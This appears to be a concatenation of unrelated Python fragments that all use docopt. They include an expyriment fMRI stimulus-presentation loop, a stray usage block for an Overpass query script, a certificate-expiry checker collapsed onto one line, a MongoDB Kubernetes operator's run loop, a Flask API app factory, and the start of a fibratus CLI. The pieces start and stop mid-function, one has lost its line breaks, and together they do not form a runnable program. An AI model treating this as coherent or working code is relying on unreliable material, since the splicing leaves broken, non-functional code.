    args = docopt.docopt(__doc__, version='0.0.1')

    # Initialize expyriment & wait its message to show
    initialize.init_arguments(args)
    exp = initialize.init_expyriment(args)

    # Useful shortcuts throughout the file
    kb = expyriment.io.Keyboard()

    # If we need to calibrate, then do so and terminate.
    if args["calibrate"]:
        calibration(exp, args)
        expyriment.control.end('Merci !', 2000)
        return 0

    # Hash table for fast retrieval when presenting: reading from disk is slow!
    hash_table = dict()

    # Now let's read the csv file line by line and populate the events.
    # PriorityQueue sort on insertion based on the first element of the
    # inserted tuple: this means your csv file can have random order, or that
    # you can take input from several csv files
    events = queue.PriorityQueue()
    for csv_file in args["<file>"]:
        # Save the path to the CSV file
        exp.add_experiment_info(csv_file)
        # Create the path to the stimuli
        bp = args["--stim-dir"]
        # Open the csv file and read its rows.
        # ATTENTION : Encoding is platform dependant. See the open() manual
        for row in csv.reader(open(csv_file), delimiter='\t'):
            # Destruct a row into its parts, they will be of type str
            onset, stype, f, *meta = row
            # If this is the first encounter of this stimuli then preload it
            if (stype, f) not in hash_table:
                hash_table[stype, f] = load_stimuli(stype, f, bp, args)
                hash_table[stype, f].preload()
            # Then push relevant events based on the type
            events.put((int(onset), stype, f, (stype, f), meta))

    expyriment.control.start(skip_ready_screen=True,
                             subject_id=args["--subject-id"])

    # Feedback sounds for the oddity trials.
    good = expyriment.stimuli.Audio(bp + "/correct.wav")
    bad = expyriment.stimuli.Audio(bp + "/incorrect.wav")
    good.preload()
    bad.preload()

    # Block until the scanner sends its 't' trigger character.
    show_text("Waiting for scanner trigger", args).present()
    kb.wait_char('t')

    # Start the experiment clock and loop through the events
    clock = expyriment.misc.Clock()
    last_right_pos = -1
    has_played = False
    while not events.empty():
        # NOTE(review): `id` shadows the builtin; it receives the stimulus
        # file name (third tuple element).
        onset, stype, id, (stype, f), *meta = events.get()
        # If it's still too early, then wait for the onset but log keypresses
        while clock.time < (onset - 1):
            k = kb.check()
            if k is not None:
                exp.data.add([clock.time, "keypressed", k])
                # First keypress of an oddity trial triggers audio feedback:
                # keycode 114 ('r') vs 108 ('l'), judged against the position
                # of the correct answer from the previous trial's metadata.
                if (not has_played) and (stype == "oddity"
                                         or stype == "oddity-faces"):
                    has_played = True
                    if k == 114:
                        if last_right_pos in [0, 1, 5]:
                            good.present()
                        elif last_right_pos in [2, 3, 4]:
                            bad.present()
                    elif k == 108:
                        if last_right_pos in [2, 3, 4]:
                            good.present()
                        elif last_right_pos in [0, 1, 5]:
                            bad.present()
        # When time has come, present the stimuli and log that you just did so
        reported_time = hash_table[stype, f].present()
        if (stype == "oddity" or stype == "oddity-faces"):
            last_right_pos = int(meta[0][0])
            has_played = False
        exp.data.add(
            list([clock.time, stype, id, onset, reported_time] + meta[0]))

    # Now the experiment is done, terminate the exp
    expyriment.control.end('Merci !', 2000)
    return 0
Options:
    -h, --help                      Show this screen.
    --version                       Show version.
    -f, --file <path-to-file>       Path to the CSV file.
    -s, --start <start-row>         Row number where the CSV should start [default: 0].
"""
import csv
import time
import sys
from docopt import docopt
from pprint import pprint
import common

args = docopt(__doc__, version='Query overpass for WC-Guide entries 1.0')
delta = decode_date(cert[1]) - datetime.datetime.now() print(u"CN : {0}".format(print_cn(cert))) print(u"Expires after {0}".format(decode_date(cert[1]))) print(u"Expires in {0} days\n".format(delta.days)) elif arguments["--watch"]: try: days = int(arguments["--watch"]) except: print(u"You did not entered a correct number of days. Exiting...") exit(1) if decode_date(cert[1]) > datetime.datetime.now() and decode_date(cert[1]) < datetime.datetime.now() + datetime.timedelta(days): delta = decode_date(cert[1]) - datetime.datetime.now() print(u"CN : {0}".format(print_cn(cert))) print(u"Expires after {0}".format(decode_date(cert[1]))) print(u"Expires in {0} days\n".format(delta.days)) elif decode_date(cert[1]) < datetime.datetime.now() and arguments["--expired"]: # If expired print(u"Certificat expired :") print(u"CN : {0}".format(print_cn(cert))) print(u"Expired since {0}\n".format(decode_date(cert[1]))) elif cert[0] == "R" and arguments["--revoked"]: print(u"Certificat revoked :") print(u"CN : {0}".format(print_cn(cert))) print(u"Revoked {0}\n".format(decode_date(cert[2]))) if __name__ == "__main__": arguments = docopt(help) if arguments["--crl"]: parse_crl() else: parse_index()
                # Fragment of the operator run loop: (re)start worker
                # threads that have not been started yet (ident is None
                # until Thread.start()), then poll every 5 seconds.
                if not self.periodic_check_thread.ident:
                    self.periodic_check_thread.start()
                if not self.event_listener_thread.ident:
                    self.event_listener_thread.start()
                sleep(5)
        except KeyboardInterrupt:
            # Graceful shutdown: signal the workers and wait for them.
            logging.info('Stopping threads')
            self.shutting_down.set()
            self.periodic_check_thread.join()
            self.event_listener_thread.join()


if __name__ == '__main__':
    args = docopt(__doc__, version='MongoDB Operator 0.1')
    logging.basicConfig(
        level=getattr(logging, args['--loglevel'].upper()),
        format='%(asctime)s %(levelname)s %(threadName)s %(message)s')
    # Suppress urllib3.connectionpool warnings that seem to come from the
    # Python kubernetes client
    logging.getLogger('urllib3.connectionpool').setLevel(logging.ERROR)
    try:
        mongodb_operator = MongoDBOperator()
    except config.config_exception.ConfigException as e:
        logging.error(
            'unable to connect to k8s apiserver using service account')
        exit(1)
    except Exception as e:
from docopt import docopt
from flask import Flask
from flask_mongoengine import MongoEngine
from werkzeug.contrib.fixers import ProxyFix

from api.venicescholar_api.cache import cache
from api.venicescholar_api import api, api_blueprint


def create_app(config_file="config/dev.cfg"):
    """
    Returns an instance of the LinkedBooks API as a flask app.

    Args:
        config_file: path to a Flask config file loaded via from_pyfile.
    """
    app = Flask(__name__)
    app.config.from_pyfile(config_file)
    cache.init_app(app)
    # MongoEngine reads its connection settings from app.config.
    db = MongoEngine()
    db.init_app(app)
    # ProxyFix lets the app trust X-Forwarded-* headers behind a proxy.
    app.wsgi_app = ProxyFix(app.wsgi_app)
    app.register_blueprint(api_blueprint)
    return app


# Module-level app with the dev config, so WSGI servers can import `app`
# directly; running as a script below rebuilds it with the --config value.
app = create_app(config_file="config/dev.cfg")
#pdb.set_trace()

if __name__ == "__main__":
    arguments = docopt(__doc__)
    app = create_app(config_file=arguments["--config"])
    app.run()
    --version                  Show version.
"""
import sys

from docopt import docopt
from prettytable import PrettyTable

from fibratus.apidefs.sys import set_console_ctrl_handler, PHANDLER_ROUTINE
from fibratus.common import IO
from fibratus.errors import FilamentError
from fibratus.kevent import KEvents
from fibratus.version import VERSION
from fibratus.fibratus_entrypoint import Fibratus
from fibratus.filament import Filament

# Parsed at import time; the __main__ guard below dispatches on the result.
args = docopt(__doc__, version=VERSION)
kevent_filters = args['<kevents>']
filament_name = args['--filament'] if args['--filament'] else None


def _check_kevent(kevent):
    # Reject unknown kernel event names with a console error and exit.
    if not kevent in KEvents.all():
        IO.write_console(
            'fibratus run: ERROR - %s is not a valid kernel event. Run list-kevents to see'
            ' the available kernel events' % kevent)
        sys.exit()


if __name__ == '__main__':
    if args['run']: